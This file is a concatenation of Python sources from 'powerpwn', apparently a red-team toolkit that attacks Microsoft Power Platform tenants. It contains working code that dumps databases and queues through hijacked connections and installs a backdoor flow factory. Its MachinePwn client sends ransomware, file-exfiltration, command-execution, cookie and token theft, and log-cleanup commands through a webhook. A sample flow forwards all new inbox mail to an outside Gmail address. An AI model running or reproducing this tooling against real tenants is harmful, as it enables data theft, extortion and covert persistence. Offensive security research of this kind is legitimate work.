        can_list_databases, databases_val = consecutive_gets(
            session=self._session,
            expected_status_prefix="200",
            property_to_extract_data="Databases",
            url=f"{self._root}/v2/cosmosdb/{data_store.data_store.name}/dbs",
        )
        if can_list_databases:
            for db_obj in databases_val:
                db_name = db_obj["id"]

                can_list_collections, collections_val = consecutive_gets(
                    session=self._session,
                    expected_status_prefix="200",
                    property_to_extract_data="DocumentCollections",
                    url=f"{self._root}/v2/cosmosdb/{data_store.data_store.name}/dbs/{db_name}/colls",
                )
                if can_list_collections:
                    for collection in collections_val:
                        data_records.append(
                            DataRecord(
                                record_type=DataDumpType.collection,
                                record_id=collection["id"],
                                record_name=f'{db_name}-{collection["id"]}',
                                extra={"db_name": db_name},
                            )
                        )

        return data_records

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        db_name = data_record.data_record.extra["db_name"]
        success, val = consecutive_gets(
            session=self._session,
            expected_status_prefix="200",
            property_to_extract_data="Documents",
            url=f"{self._root}/v2/cosmosdb/{data_record.data_store.data_store.name}/dbs/{db_name}/colls/{data_record.data_record.record_id}/docs",
        )

        if not success:
            raise ValueError(
                f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}."
            )

        document_value = json.dumps(val).encode(ENCODING)

        data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value)
        return data_dump

    @classmethod
    def api_name(cls) -> str:
        return "shared_documentdb"

    @classmethod
    def _apim_path(cls) -> str:
        return "documentdb"



import json
from typing import List

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase
from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext
from powerpwn.powerdump.utils.const import ENCODING
from powerpwn.powerdump.utils.requests_wrapper import request_and_verify


class SharedAzureQueuesConnector(ConnectorBase):
    def _ping(self, connection_parameters: dict) -> List[DataStore]:
        data_stores: List[DataStore] = []

        # we dont have server/database for another auth types
        if connection_parameters.get("name", "") != "keyBasedAuth":
            return data_stores

        success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection")

        storage_account_name = connection_parameters["values"]["storageaccount"]["value"]

        # if connection is connected with blob endpoint and not storage account
        if storage_account_name.startswith("https://"):
            storage_account_name = "AccountNameFromSettings"  # a hack # connection_parameters["values"]["accountName"]["value"].split(".blob.core.windows.net")[0].partition("https://")[2]

        if success:
            can_list_root_queues, _, queues_val = request_and_verify(
                session=self._session,
                expected_status_prefix="200",
                method="get",
                url=f"{self._root}/v2/storageAccounts/{storage_account_name}/queues/list",
            )
            if can_list_root_queues:
                for queue in queues_val:
                    data_stores.append(
                        DataStore(
                            tenant=None,
                            scope=None,
                            account=storage_account_name,
                            name=queue["Name"],
                            host=f'https://{storage_account_name}.queue.core.windows.net/{queue["Name"]}',
                            extra={},
                        )
                    )

        return data_stores

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        return [
            DataRecord(record_type=DataDumpType.queue_message, record_id=data_store.data_store.name, record_name=data_store.data_store.name, extra={})
        ]

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        queue_name = data_record.data_record.record_id

        success, _, val = request_and_verify(
            session=self._session,
            expected_status_prefix="200",
            method="get",
            url=f"{self._root}/v2/storageAccounts/{data_record.data_store.data_store.account}/queues/{queue_name}/messages?numofmessages=10",
        )

        if not success:
            raise ValueError(
                f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}."
            )

        messages = val["QueueMessagesList"]["QueueMessage"]
        document_value = json.dumps(messages).encode(ENCODING)

        data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value)
        return data_dump

    @classmethod
    def api_name(cls) -> str:
        return "shared_azurequeues"

    @classmethod
    def _apim_path(cls) -> str:
        return "azurequeues"



"""
Copied from AFK
"""

import json
import logging
from typing import Any, Callable, Dict, List, Optional, Tuple, Union

from powerpwn.cli.const import LOGGER_NAME
from powerpwn.powerdump.collect.models.base_entity import BaseEntity

logger = logging.getLogger(LOGGER_NAME)


def _flatten_nested_dict(val: Any, prefix: str = "") -> List[Tuple[Any, Any]]:
    res = []
    if isinstance(val, (str, int, float, bool)) or val is None:
        res.append((val, prefix))
    elif isinstance(val, dict):
        for k in val.keys():
            res.extend(_flatten_nested_dict(val[k], f"{prefix}.{k}"))
    elif isinstance(val, (list, tuple)):
        for i in range(len(val)):
            res.extend(_flatten_nested_dict(val[i], f"{prefix}.{i}"))
    elif isinstance(val, BaseEntity):
        res.extend(_flatten_nested_dict(json.loads(val.json()), prefix))
    else:
        raise ValueError(f"Unsupported type {type(val)}.")
    return res


def flatten_nested_dict(val: Any) -> Dict[Any, Any]:
    """
    Flatten nested dict recursively
    @param val: nested dict
    @return: flattened dict
    """
    res = _flatten_nested_dict(val)
    return {key: val for val, key in res}


def deep_compare_nested_dict(val_one: Any, val_two: Any, allow_additional_keys: bool = False) -> bool:
    """
    Compare nested dict recursively
    @param val_one: first nested dict
    @param val_two: second nested dict
    @param allow_additional_keys: if True, val_one and val_two are allowed to contains nested properties that are not present in the other.
    @return: whether the two dicts are equal in all nested properties
    """
    val_one_flat = flatten_nested_dict(val_one)
    val_two_flat = flatten_nested_dict(val_two)

    val_one_key_set = set(val_one_flat.keys())
    val_two_key_set = set(val_two_flat.keys())

    missing_key_from_val_one = val_one_key_set.difference(val_two_key_set)
    if len(missing_key_from_val_one) > 0:
        logger.debug(f"val_two is missing the following elements from val_one: {missing_key_from_val_one}.")
        if not allow_additional_keys:
            return False

    missing_key_from_val_two = val_two_key_set.difference(val_one_key_set)
    if len(missing_key_from_val_two) > 0:
        logger.debug(f"val_one is missing the following elements from val_two: {missing_key_from_val_two}.")
        if not allow_additional_keys:
            return False

    mutual_keys = val_one_key_set.intersection(val_two_key_set)
    for k in mutual_keys:
        # pydantic and json load can change type of int, bool and more from str
        if not json_consistent_compare(val_one_flat[k], val_two_flat[k]):
            logger.debug(f"Value for key {k} does not align.")
            return False

    return True


def json_consistent_compare(val_one: Optional[Union[str, int, bool, float]], val_two: Optional[Union[str, int, bool, float]]) -> bool:
    """
    Compares values in a way consistent with json dump and load.
    I.e, json_consistent_compare(val, json.loads(json.dumps(val))) is True.
    @param val_one: value to compare.
    @param val_two: value to compare.
    @return: whether the two values are equal in a way consistent with json dump and load.
    """
    if isinstance(val_one, type(val_two)) or isinstance(val_one, bool) or isinstance(val_two, bool):
        return val_one == val_two
    elif isinstance(val_one, str) or isinstance(val_two, str):
        return str(val_one) == str(val_two)
    elif isinstance(val_one, str) or isinstance(val_two, str):
        return str(val_one) == str(val_two)
    elif isinstance(val_one, int) and isinstance(val_two, float):
        return float(val_one) == val_two
    elif isinstance(val_two, int) and isinstance(val_one, float):
        return float(val_two) == val_one
    else:
        raise ValueError(f"Unsupported type combination {type(val_one)}, {type(val_one)}.")


def change_obj_recu(val: Any, obj_changer: Callable[[dict], None]) -> None:
    if isinstance(val, (str, int, float, bool)) or val is None:
        return
    elif isinstance(val, dict):
        obj_changer(val)

        for k in val.keys():
            change_obj_recu(val[k], obj_changer=obj_changer)
    elif isinstance(val, (list, tuple)):
        for i in range(len(val)):
            change_obj_recu(val[i], obj_changer=obj_changer)
    elif isinstance(val, BaseEntity):
        change_obj_recu(val.json(), obj_changer=obj_changer)
    else:
        raise ValueError(f"Unsupported type {type(val)}.")



import json
import logging
import os
import pathlib

from powerpwn.cli.const import LOGGER_NAME
from powerpwn.powerdump.utils.requests_wrapper import init_session

logger = logging.getLogger(LOGGER_NAME)


class FlowFlowInstaller:
    def __init__(self, token: str):
        self.__session = init_session(token=token)

    def install(self, environment_id: str, connection_id: str) -> None:
        path = os.path.join(pathlib.Path(__file__).parent.resolve(), "samples", "flow_factory_to_install.json")
        with open(path) as f:
            flow_definition = json.load(f)
            flow_definition["properties"]["connectionReferences"]["shared_flowmanagement"]["connectionName"] = connection_id

            result = self.__session.post(
                f"https://emea.api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/{environment_id}/flows?api-version=2016-11-01",
                json=flow_definition,
            )
            if result.status_code == 201:
                res_json = json.loads(result.text)
                logger.info(f'Flow installed successfully. Flow id{res_json["id"]}')
                logger.info("Getting flow webhook url...")
                flow_name = res_json["name"]
                result = self.__session.post(
                    f"https://emea.api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/{environment_id}/flows/{flow_name}/triggers/manual/listCallbackUrl?api-version=2016-11-01"
                )
                if result.status_code == 200:
                    webhook_url = json.loads(result.text)["response"]["value"]
                    logger.info(f"Webhook url is: {webhook_url}")
            else:
                logger.warning(f"Something wen wrong. status code: {result.status_code}, text: {result.text}")



## A Sample flow to create in powerplatform ##

SAMPLE_FLOW = {
    "environment": "Default-32f814a9-68c8-4ca1-93aa-5594523476b3",
    "connectionName": "shared-gmail-444b9c37-a162-47e0-bbaf-7c2a-3fa7cbbd",
    "connectionApiId": "/providers/Microsoft.PowerApps/apis/shared_gmail",
    "flowDisplayName": "PWN",
    "flowDefinition": {
        "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {"$connections": {"defaultValue": {}, "type": "Object"}, "$authentication": {"defaultValue": {}, "type": "SecureObject"}},
        "triggers": {
            "When_a_new_email_arrives": {
                "recurrence": {"frequency": "Minute", "interval": 1},
                "metadata": {"operationMetadataId": "f8fda515-f436-4f4d-811d-33a37c6ea879"},
                "type": "OpenApiConnection",
                "inputs": {
                    "host": {
                        "apiId": "/providers/Microsoft.PowerApps/apis/shared_gmail",
                        "connectionName": "shared_gmail",
                        "operationId": "OnNewEmail",
                    },
                    "parameters": {
                        "label": "INBOX",
                        "importance": "All",
                        "starred": "All",
                        "fetchOnlyWithAttachments": False,
                        "includeAttachments": False,
                    },
                    "authentication": "@parameters('$authentication')",
                },
            }
        },
        "actions": {
            "Send_email_(V2)_2": {
                "runAfter": {},
                "metadata": {"operationMetadataId": "16392aa1-6da8-42ca-a366-18d69194da73"},
                "type": "OpenApiConnection",
                "inputs": {
                    "host": {
                        "apiId": "/providers/Microsoft.PowerApps/apis/shared_gmail",
                        "connectionName": "shared_gmail",
                        "operationId": "SendEmailV2",
                    },
                    "parameters": {"emailMessage/To": "imkrissmith@gmail.com"},
                    "authentication": "@parameters('$authentication')",
                },
            }
        },
    },
    "flowState": "Stopped",
    "connectionReferences": [
        {"connectionName": "shared-gmail-444b9c37-a162-47e0-bbaf-7c2a-3fa7cbbd", "id": "/providers/Microsoft.PowerApps/apis/shared_gmail"}
    ],
}



from pydantic import Field

from powerpwn.machinepwn.enums.code_exec_type_enum import CodeExecTypeEnum
from powerpwn.machinepwn.models.command_args_properties_base_model import CommandArgsPropertiesBaseModel


class CodeExecArgsProperties(CommandArgsPropertiesBaseModel):
    code_exec_command_type: CodeExecTypeEnum = Field(help="Execution environment")
    code_exec_command: str = Field(help="A command to execute encoded as a string")



import logging
import time
from typing import Any, Dict, List, Optional

import requests

from powerpwn.cli.const import LOGGER_NAME, TOOL_NAME

logger = logging.getLogger(LOGGER_NAME)


def init_session(token: str) -> requests.Session:
    session = requests.Session()
    session.headers = {"accept": "application/json", "Authorization": token, "User-Agent": TOOL_NAME}
    return session


def consecutive_gets(
    session: requests.Session,
    expected_status_prefix: str = "200",
    property_to_extract_data: str = "value",
    property_for_pagination: str = "continuationToken",
    **kwargs,
):
    value: List[Dict[str, Any]] = []
    success = False
    cont_token = ""  # nosec

    resp_obj = {property_for_pagination: "NOT_EMPTY"}
    while resp_obj.get(property_for_pagination) not in (None, cont_token):
        cont_token = resp_obj.get(property_for_pagination, "")

        success, _, resp_obj = request_and_verify(session=session, expected_status_prefix=expected_status_prefix, method="get", **kwargs)
        if not success:
            break

        if property_to_extract_data not in resp_obj and value != []:
            raise ValueError("Inconsistent responses.")
        if property_to_extract_data not in resp_obj and value == []:
            logger.warning(f"Expected an array response, received an object: {resp_obj}. Request: {kwargs}.")
            success = True
            value += [resp_obj]
        else:
            success = True
            value += resp_obj[property_to_extract_data]

    return success, value


def request_and_verify(session: requests.Session, expected_status_prefix: str = "200", is_json_resp: bool = True, **kwargs):
    success = False
    resp_obj = None
    resp_head = None

    logger.debug(f"Triggering request ({kwargs}).")
    resp = session.request(**kwargs)
    resp_obj = __get_resp_obj(resp) if is_json_resp else resp.text
    if str(resp.status_code).startswith(expected_status_prefix):
        resp_head = resp.headers
        success = True
    else:
        if resp.status_code == 429:
            __handle_throttling(resp_obj)
            return request_and_verify(session, expected_status_prefix, **kwargs)
        logger.info(f"Failed at request ({kwargs}) with status_code={resp.status_code} and content={str(resp.content)}.")

    return success, resp_head, resp_obj


def __get_resp_obj(resp) -> Optional[Dict]:
    resp_obj = None
    try:
        resp_obj = resp.json()
    except requests.exceptions.JSONDecodeError:
        return None

    return resp_obj


def __handle_throttling(resp_obj) -> None:
    message = resp_obj.get("message", "") if resp_obj else ""
    throttling_message_prefix = "Rate limit is exceeded. Try again in "
    if throttling_message_prefix in message:
        seconds_to_wait = int(message.partition(throttling_message_prefix)[2].partition(" seconds")[0])
        logger.info(f"API throttled, going to sleep {seconds_to_wait + 1} before retry")
        time.sleep(seconds_to_wait + 1)
    else:
        time.sleep(20)



import json
from typing import List

import requests
from pydantic.error_wrappers import ValidationError

from powerpwn.machinepwn.enums.code_exec_type_enum import CodeExecTypeEnum
from powerpwn.machinepwn.models.any_command_args import AnyCommandArgs
from powerpwn.machinepwn.models.cleanup_command_args import CleanupCommandArgs
from powerpwn.machinepwn.models.cmd_results import CommandResults
from powerpwn.machinepwn.models.code_exec_args_properties import CodeExecArgsProperties
from powerpwn.machinepwn.models.code_exec_command_args import CodeExecCommandArgs
from powerpwn.machinepwn.models.command_args_properties_base_model import CommandArgsPropertiesBaseModel
from powerpwn.machinepwn.models.exflirtate_file_args_properties import ExflirtateFileArgsProperties
from powerpwn.machinepwn.models.exflirtate_file_command_args import ExflirtateFileCommandArgs
from powerpwn.machinepwn.models.ransomware_args_properties import RansomwareArgsProperties
from powerpwn.machinepwn.models.ransomware_command_args import RansomwareCommandArgs
from powerpwn.machinepwn.models.steal_cookie_args_properties import StealCookieArgsProperties
from powerpwn.machinepwn.models.steal_cookie_command_args import StealCookieCommandArgs
from powerpwn.machinepwn.models.steal_power_automate_token_command_args import StealPowerAutomateTokenCommandArgs


class MachinePwn:
    def __init__(self, post_url: str, debug: bool = False):
        """
        Power Pwn client to run commands through Microsoft infrastructure
        :param post_url: a URL on the malicious Microsoft instance to post commands to
        :param debug: whether to print debug messages
        """
        self.post_url = post_url
        self.debug = debug

    def run_cmd(self, arguments: AnyCommandArgs) -> CommandResults:
        if self.debug:
            print(f"Raw command: {arguments.__root__}")

        try:
            cmd_args = json.loads(arguments.__root__.json())
        except json.JSONDecodeError:
            print(f"Bad command. Raw content: {arguments}")
            raise

        results = self._run_cmd(arguments_as_dict=cmd_args)

        if "error" in results:
            cmd_res = CommandResults(is_success=False, error_message=results["error"]["message"])
        else:
            cmd_res = CommandResults.parse_obj(results)
        return cmd_res

    def _run_cmd(self, arguments_as_dict: dict) -> dict:  # type: ignore
        # noinspection PyTypeChecker
        resp = requests.post(url=self.post_url, json=arguments_as_dict)  # nosec

        if self.debug:
            print(f"Raw content: {resp.content.decode('utf8')}")

        try:
            return resp.json()
        except ValidationError:
            print(f"Bad response. Raw content: {resp.content.decode('utf8')}")
            raise

    def exec_command(self, command: str, command_type: CodeExecTypeEnum) -> CommandResults:
        props = CodeExecArgsProperties(code_exec_command_type=command_type, code_exec_command=command)
        flow_args = AnyCommandArgs.parse_obj(CodeExecCommandArgs(command_properties=props))  # type: ignore[arg-type]
        return self.run_cmd(flow_args)

    def ransomware(self, crawl_depth: str, dirs_to_init_crawl: List[str], encryption_key: str) -> CommandResults:
        """
        Overwrite all files in dirs_to_init_crawl with an encrypted version
        :param crawl_depth: recursively search into subdirectories this many times
        :param dirs_to_init_crawl: a list of directories to begin crawl from separated by a command (e.g.'C:\\,D:\\')
        :param encryption_key: an encryption key used to encrypt each file identified (AES256)
        :return: command results
        """
        dirs_to_init_crawl_str = ",".join(dirs_to_init_crawl)
        props = RansomwareArgsProperties(
            ransomware_crawl_depth=crawl_depth, ransomware_directories_to_init_crawl=dirs_to_init_crawl_str, ransomware_encryption_key=encryption_key
        )
        flow_args = AnyCommandArgs.parse_obj(RansomwareCommandArgs(command_properties=props))  # type: ignore[arg-type] # known bug: https://github.com/python/mypy/issues/13421
        return self.run_cmd(flow_args)

    def exfiltrate(self, target_file_path: str) -> CommandResults:
        """
        Exfiltrate file from victim machine
        :param target_file_path: absolute path to file
        :return: command results
        """
        props = ExflirtateFileArgsProperties(exfiltrate_target_file=target_file_path)
        flow_args = AnyCommandArgs.parse_obj(ExflirtateFileCommandArgs(command_properties=props))  # type: ignore[arg-type]
        return self.run_cmd(flow_args)

    def cleanup(self) -> CommandResults:
        """
        Delete agent log files
        :return: command results
        """

        flow_args = AnyCommandArgs.parse_obj(CleanupCommandArgs(command_properties=CommandArgsPropertiesBaseModel()))  # type: ignore[arg-type]
        return self.run_cmd(flow_args)

    def steal_power_automate_token(self) -> CommandResults:
        """
        Open a browser, go to the Power Automate website and steal the authentication token
        :return: command results
        """
        flow_args = AnyCommandArgs.parse_obj(StealPowerAutomateTokenCommandArgs(command_properties=CommandArgsPropertiesBaseModel()))  # type: ignore[arg-type]
        return self.run_cmd(flow_args)

    def steal_cookie(self, fqdn: str) -> CommandResults:
        """
        Open a browser, go to the FQDN and seal its cookies
        :param fqdn: fully qualified domain name to fetch the cookies of
        :return: command results
        """
        props = StealCookieArgsProperties(steal_cookie_fqdn=fqdn)
        flow_args = AnyCommandArgs.parse_obj(StealCookieCommandArgs(command_properties=props))  # type: ignore[arg-type]
        return self.run_cmd(flow_args)



from typing import Any, Dict, Optional

from powerpwn.powerdump.collect.models.base_entity import BaseEntity
from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType


class ResourceEntityBase(BaseEntity):
    entity_type: ResourceType
    display_name: Optional[str] = None
    entity_id: str
    raw_json: Dict[str, Any]



import logging
from typing import Generator

import requests

from powerpwn.cli.const import LOGGER_NAME
from powerpwn.powerdump.collect.models.canvas_app_entity import CanvasApp
from powerpwn.powerdump.collect.models.principal_entity import Principal
from powerpwn.powerdump.collect.resources_collectors._api import list_canvas_app_rbac, list_canvas_apps
from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType
from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector

logger = logging.getLogger(LOGGER_NAME)


class CanvasAppsCollector(IResourceCollector):
    def collect(self, session: requests.Session, environment_id: str) -> Generator[CanvasApp, None, None]:
        total_canvas_apps = 0
        total_widely_shared_canvas_apps = 0
        for canvas_app in list_canvas_apps(session, environment_id):
            total_canvas_apps += 1
            rbacs = list(list_canvas_app_rbac(session, canvas_app["name"], environment_id))
            if any(rbac.get("properties", {}).get("principal", {}).get("type", "NOT_TENANT") == "Tenant" for rbac in rbacs):
                total_widely_shared_canvas_apps += 1
                principals = []
                for rbac in rbacs:
                    if rbac["properties"]["principal"]["type"] == "Tenant":
                        principals.append(
                            Principal(
                                entity_type=ResourceType.principal,
                                entity_id=rbac["properties"]["principal"].get("tenantId"),
                                principal_id=rbac["properties"]["principal"].get("tenantId"),
                                type=rbac["properties"]["principal"].get("type"),
                                tenant_id=rbac["properties"]["principal"].get("tenantId"),
                                raw_json=rbac,
                                display_name=rbac["properties"]["principal"].get("tenantId"),
                            )
                        )
                    else:
                        principals.append(
                            Principal(
                                entity_type=ResourceType.principal,
                                entity_id=rbac["properties"]["principal"].get("id"),
                                principal_id=rbac["properties"]["principal"].get("id"),
                                type=rbac["properties"]["principal"].get("type"),
                                tenant_id=rbac["properties"]["principal"].get("tenantId", "N/A"),
                                display_name=rbac["properties"]["principal"].get("displayName"),
                                email=rbac["properties"]["principal"].get("email"),
                                upn=rbac["properties"]["principal"].get("email"),
                                raw_json=rbac,
                            )
                        )

                created_by = Principal(
                    entity_type=ResourceType.principal,
                    entity_id=canvas_app["properties"]["createdBy"].get("id"),
                    principal_id=canvas_app["properties"]["createdBy"].get("id"),
                    type=canvas_app["properties"]["createdBy"].get("type"),
                    tenant_id=canvas_app["properties"]["createdBy"].get("tenantId", "N/A"),
                    display_name=canvas_app["properties"]["createdBy"].get("displayName"),
                    email=canvas_app["properties"]["createdBy"].get("email"),
                    upn=canvas_app["properties"]["createdBy"].get("userPrincipalName"),
                    raw_json=canvas_app["properties"]["createdBy"],
                )

                run_url = canvas_app["properties"]["appPlayUri"]
                version = canvas_app["properties"]["appVersion"]
                environment_id = canvas_app["properties"]["environment"]["name"].replace("default", "Default")

                yield CanvasApp(
                    raw_json=canvas_app,
                    display_name=canvas_app["properties"]["displayName"],
                    created_by=created_by,
                    created_at=canvas_app["properties"]["createdTime"],
                    last_modified_at=canvas_app["properties"]["lastModifiedTime"],
                    run_url=run_url,
                    version=version,
                    permissions=principals,
                    entity_id=canvas_app["name"],
                    environment_id=environment_id,
                    entity_type=ResourceType.canvas_app,
                )
        logger.info(
            f"Found {total_widely_shared_canvas_apps} widely shared canvas apps out of {total_canvas_apps} canvas apps in environment {environment_id}"
        )

    def resource_type(self) -> ResourceType:
        return ResourceType.canvas_app



from powerpwn.enums.str_enum import StrEnum


class BackdoorActionType(StrEnum):
    create_flow = "create-flow"
    delete_flow = "delete-flow"
    get_connections = "get-connections"
    install_factory = "install-factory"



import json
import logging
import os
from typing import Any, Dict, List

import requests
from pydantic import ValidationError

from powerpwn.cli.const import LOGGER_NAME, TOOL_NAME
from powerpwn.powerdoor.create_flow_model import CreateFlowModel

logger = logging.getLogger(LOGGER_NAME)


class BackdoorFlow:
    def __init__(self, webhook: str):
        self.webhook = webhook
        self.session = requests.Session()
        self.session.headers = {"User-Agent": TOOL_NAME}

    def __command(self, action: str, inputs: Dict[str, Any], output_to_stdout: bool = True):
        resp = self.session.post(url=self.webhook, json={"action": action, "inputs": inputs})
        if resp.status_code == 400:
            logger.error(f"Bad request schema. Error: {resp.content}.")
        elif resp.status_code == 500 and "action" in resp.headers:
            logger.error(f"Failed to perform action {resp.headers['action']}. Error: {resp.content}.")
        elif resp.status_code == 200:
            logger.info(f"Action {action} completed successfully.")
            if output_to_stdout:
                logger.info(f"Response: {resp.content}.")
            pass
        else:
            logger.error(f"Unexpected status code {resp.status_code}. Error: {resp.content}.")

        json_content = resp.json()
        return json_content

    def get_connections(self, environment_id: str, output_to_stdout: bool = True):
        # returns: connectionName=['name'], id=['properties']['apiId']
        return self.__command(action="getConnections", inputs={"environment": environment_id}, output_to_stdout=output_to_stdout)

    def create_flow(
        self,
        environment_id: str,
        flow_display_name: str,
        flow_definition: Any,
        flow_state: str,
        connection_references: List[Dict[str, str]],
        is_webhook: bool,
    ):
        # returns: flowId=['flowId']
        return self.__command(
            action="createFlow",
            inputs={
                "environment": environment_id,
                "flowDisplayName": flow_display_name,
                "flowDefinition": flow_definition,
                "flowState": flow_state,
                "connectionReferences": connection_references,
                "isWebhook": is_webhook,
            },
            output_to_stdout=True,
        )

    def create_flow_from_input_file(self, environment_id: str, input_file_path: str):
        if not os.path.exists(input_file_path):
            logger.info("Input file is not found")
            return None

        with open(input_file_path) as f:
            try:
                input_file_content = json.load(f)
                input_file_model = CreateFlowModel.parse_obj(input_file_content)
                is_webhook = input_file_model.flow_definition["triggers"].get("manual", {}).get("kind", "") == "Http"
                return self.create_flow(
                    environment_id,
                    input_file_model.flow_display_name,
                    input_file_model.flow_definition,
                    input_file_model.flow_state,
                    input_file_model.connection_references,
                    is_webhook=is_webhook,
                )
            except json.decoder.JSONDecodeError:
                logger.info("Input file is not a valid json.")
                return None
            except ValidationError:
                logger.info("Input file is not in expected format. ")
                return None

    def delete_flow(self, environment_id: str, flow_id: str):
        # returns:
        return self.__command(action="deleteFlow", inputs={"environment": environment_id, "flowId": flow_id})



from typing import Any, Dict, List

from pydantic import BaseModel

from powerpwn.powerdoor.enums.flow_state import FlowState


class CreateFlowModel(BaseModel):
    flow_display_name: str
    flow_definition: Dict[str, Any]
    flow_state: FlowState
    connection_references: List[Dict[str, str]]



from pydantic import Field

from powerpwn.machinepwn.models.command_args_properties_base_model import CommandArgsPropertiesBaseModel


class RansomwareArgsProperties(CommandArgsPropertiesBaseModel):
    ransomware_crawl_depth: str = Field(help="Recursively search into subdirectories this many times")
    ransomware_directories_to_init_crawl: str = Field(help="A list of directories to begin crawl from separated by a command (e.g.'C:\\,D:\\')")
    ransomware_encryption_key: str = Field(help="an encryption key used to encrypt each file identified (AES256)")



import argparse
import logging

from powerpwn.machinepwn.enums.code_exec_type_enum import CodeExecTypeEnum
from powerpwn.powerdoor.enums.action_type import BackdoorActionType
from powerpwn.powerdump.utils.const import CACHE_PATH


def module_gui(sub_parser: argparse.ArgumentParser):
    gui_parser = sub_parser.add_parser("gui", description="Show collected resources and data.", help="Show collected resources and data via GUI.")
    gui_parser.add_argument("--cache-path", default=CACHE_PATH, type=str, help="Path to cached resources.")


def module_dump(sub_parser: argparse.ArgumentParser):
    dump_parser = sub_parser.add_parser(
        "dump",
        description="Recon for available data connections and dump their content",
        help="Recon for available data connections and dump their content.",
    )
    dump_parser.add_argument("-c", "--clear-cache", action="store_true", help="Clear local disk cache")
    dump_parser.add_argument("--cache-path", default=CACHE_PATH, help="Path to store collected resources and data.")
    dump_parser.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.")
    dump_parser.add_argument("-g", "--gui", action="store_true", help="Run local server for gui.")


def module_nocodemalware(command_subparsers: argparse.ArgumentParser):
    nocodemalware_parser = command_subparsers.add_parser(
        "nocodemalware",
        description="Repurpose trusted execs, service accounts and cloud services to power a malware operation",
        help="Repurpose trusted execs, service accounts and cloud services to power a malware operation.",
    )
    nocodemalware_parser.add_argument(
        "-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform"
    )
    nocodemalware_parser = nocodemalware_parser.add_subparsers(help="nocodemalware_subcommand", dest="nocodemalware_subcommand")

    module_nocodemalware_subcommand_exec(nocodemalware_parser)


def module_nocodemalware_subcommand_exec(command_subparsers: argparse.ArgumentParser):
    steal_fqdn_parser = command_subparsers.add_parser("steal-cookie", description="Steal cookie of fqdn")
    steal_fqdn_parser.add_argument("--fqdn", required=True, type=str, help="Fully qualified domain name to fetch the cookies of")

    steal_power_automate_token_parser = command_subparsers.add_parser("steal-power-automate-token", description="Steal power automate token")

    execute_command_parser = command_subparsers.add_parser("command-exec", description="Execute command on machine")
    execute_command_parser.add_argument(
        "-t", "--type", required=True, type=str, choices=[cmd_type.value for cmd_type in CodeExecTypeEnum], help="Command type"
    )
    execute_command_parser.add_argument("-c", "--command-to-execute", required=True, type=str, help="Command to execute")

    ransomware_parser = command_subparsers.add_parser("ransomware", description="Ransomware")
    ransomware_parser.add_argument("--crawl_depth", required=True, type=str, help="Recursively search into subdirectories this many times")
    ransomware_parser.add_argument(
        "-k", "--encryption-key", required=True, type=str, help="an encryption key used to encrypt each file identified (AES256)"
    )
    ransomware_parser.add_argument(
        "--dirs", required=True, type=str, help="A list of directories to begin crawl from separated by a comma (e.g.'C:\\,D:\\')"
    )

    exfiltrate_file_parser = command_subparsers.add_parser("exfiltrate", description="Exfiltrate file")
    exfiltrate_file_parser.add_argument("-f", "--file", required=True, type=str, help="Absolute path to file")

    cleanup_parser = command_subparsers.add_parser("cleanup", description="Cleanup")


def module_backdoor(command_subparsers: argparse.ArgumentParser):
    backdoor_parser = command_subparsers.add_parser(
        "backdoor", description="Install a backdoor on the target tenant.", help="Install a backdoor on the target tenant"
    )
    backdoor_parser.add_argument("-e", "--environment-id", required=True, type=str, help="Environment id in powerplatform.")
    backdoor_subparsers = backdoor_parser.add_subparsers(help="backdoor_subcommand", dest="backdoor_subcommand")

    ## Delete Flow parser ##
    delete_flow_parser = backdoor_subparsers.add_parser(
        BackdoorActionType.delete_flow.value, description="Deletes flow.", help="Deletes flow using installed backdoor flow."
    )
    delete_flow_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform")
    delete_flow_parser.add_argument("-f", "--flow-id", type=str, help="Flow id to delete.")

    ## Create Flow parser ##
    create_flow_parser = backdoor_subparsers.add_parser(
        BackdoorActionType.create_flow.value, description="Creates a flow.", help="Creates a flow using installed backdoor flow."
    )
    create_flow_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform")
    create_flow_parser.add_argument("-i", "--input", type=str, required=True, help="Path to flow details input file.")

    ## Get connections parser ##
    get_connections_parser = backdoor_subparsers.add_parser(
        BackdoorActionType.get_connections.value, description="Get connections", help="Gets connections details in environment"
    )
    get_connections_parser.add_argument(
        "-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform"
    )
    get_connections_parser.add_argument("-o", "--output", type=str, default="", help="Path to output file.")

    ## backdoor installer parser ##
    installer = backdoor_subparsers.add_parser(
        BackdoorActionType.install_factory.value, description="Install flow factory", help="Installs flow factory in powerplatform"
    )
    installer.add_argument("-c", "--connection-id", required=True, type=str, help="The connection id of management connection")
    installer.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.")


def module_phishing(command_subparsers: argparse.ArgumentParser):
    phishing_parser = command_subparsers.add_parser(
        "phishing", description="Deploy a trustworthy phishing app", help="Deploy a trustworthy phishing app."
    )


def parse_arguments():
    parser = argparse.ArgumentParser()
